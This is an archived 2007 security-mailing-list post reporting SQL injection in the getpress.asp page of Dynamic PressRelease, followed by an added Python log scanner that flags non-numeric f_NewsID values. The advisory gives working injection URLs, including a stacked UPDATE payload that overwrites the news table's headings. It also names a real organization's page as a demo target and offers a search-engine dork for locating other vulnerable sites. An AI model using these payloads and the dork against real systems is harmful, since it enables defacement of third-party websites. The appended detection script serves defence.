Computer Security
[EN] securityvulns.ru



From: okan alp <codexploder_(at)_hotmail.com>
Date: 03.08.2007
Subject: Dynamic PressRelease/getpress.asp sql injection

Dynamic PressRelease/getpress.asp sql injection


Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"

------------------------------------------------------------------

1-)  example.com/[path]/getpress.asp?f_Category=News&f_NewsID=(sql method)


1-)  example.com/dynamic/getpress.asp?f_Category=News&f_NewsID=(sql method)

------------------------------------------------------------------

2-)  example.com/[path]/getpress.asp?f_Category=News&f_NewsID=1'

2-)  example.com/[path]/getpress.asp?f_Category=News&f_NewsID=1,2,3,4,5+update+tbl+set+column='your text or meta code';--



#tbl    : news
#column : heading

###################################################################

source site : http://www.safetynews.com/

demo site   : http://www.nsca.org.au/dynamic/getpress.asp?f_Category=News&f_NewsID=260

order code for views sites :inurl:"getpress.asp?f_Category"
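
A defensive check for the parameter this advisory names, as an added example that is not part of the original post: it flags requests to getpress.asp whose f_NewsID is anything other than a plain integer. The request lines are constructed samples, and treating f_NewsID as a short decimal id (as in f_NewsID=260 above) is an assumption, as are the function names.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate f_NewsID is a short decimal id, e.g. 260.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")

# Constructed "METHOD URI" request lines, not taken from any real log.
SAMPLE_REQUESTS = [
    "GET /dynamic/getpress.asp?f_Category=News&f_NewsID=260",
    "GET /dynamic/getpress.asp?f_Category=News&f_NewsID=1'",
    "GET /dynamic/getpress.asp?f_Category=News"
    "&f_NewsID=1%3Bupdate+news+set+heading%3D%27x%27%3B--",
    "GET /dynamic/getpress.asp?f_Category=News",
    "GET /dynamic/GetPress.asp?F_NEWSID=7&f_NewsID=7%20or%201=1",
    "GET /index.asp?f_NewsID=abc",
]


def classify(request_line):
    """Return 'not-getpress', 'ok' or 'suspicious' for one request line."""
    tokens = request_line.split()
    if len(tokens) < 2:
        return "not-getpress"
    parts = urlsplit(tokens[1])
    if not parts.path.lower().endswith("/getpress.asp"):
        return "not-getpress"
    # parse_qs percent-decodes values and keeps repeated parameters as a list,
    # so encoded quotes and a second f_NewsID are both examined.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in params.items():
        # Classic ASP matches query-string names case-insensitively.
        if name.lower() == "f_newsid":
            if not all(NUMERIC_ID.fullmatch(v) for v in values):
                return "suspicious"
    return "ok"


def scan(lines):
    """Return the request lines whose f_NewsID fails the numeric check."""
    return [line for line in lines if classify(line) == "suspicious"]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print("suspicious:", hit)
```

The same allow-list test (digits only, bounded length) belongs in the application before f_NewsID reaches the query; log scanning only shows who has been probing.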

© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


